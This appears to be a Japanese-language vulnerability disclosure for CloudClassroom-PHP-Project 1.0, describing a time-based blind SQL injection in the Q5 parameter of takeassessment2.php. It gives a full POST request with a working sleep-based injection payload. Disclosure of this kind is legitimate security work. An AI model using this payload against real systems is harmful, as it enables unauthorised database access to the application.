
CloudClassroom-PHP-Project 1.0 の takeassessment2.php エンドポイントにおける時間ベースのブラインドSQLインジェクション脆弱性の概念実証で、細工されたPOSTリクエストによるリモート悪用を示します。
CloudClassroom-PHP-Project 1.0 の takeassessment2.php エンドポイントに SQL インジェクションの脆弱性が存在します。この脆弱性では、Q5 POST パラメータがサニタイズされずに SQL 文に直接埋め込まれます。
脆弱性タイプ :
SQL Injection
提供元 :
https://github.com/mathurvishal/CloudClassroom-PHP-Project
影響を受ける製品コードベース :
https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0
影響を受けるコンポーネント :
takeassessment2.php, Q5 POST パラメータ, SQL クエリロジック
攻撃ベクトル :
この脆弱性を悪用するには、攻撃者は /CloudClassroom-PHP-Project-master/takeassessment2.php に対して、Q5 パラメータに SQL 処理で時間遅延を引き起こすペイロード(ブラインド時間ベースの SQLi)を含む悪意のある POST リクエストを送信します。
POST リクエスト:
POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded
Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= これにより、レスポンスに6秒の遅延が発生し、脆弱性が確認されます。
参考 :
https://owasp.org/www-community/attacks/SQL_Injection
発見者 : saurabh solanki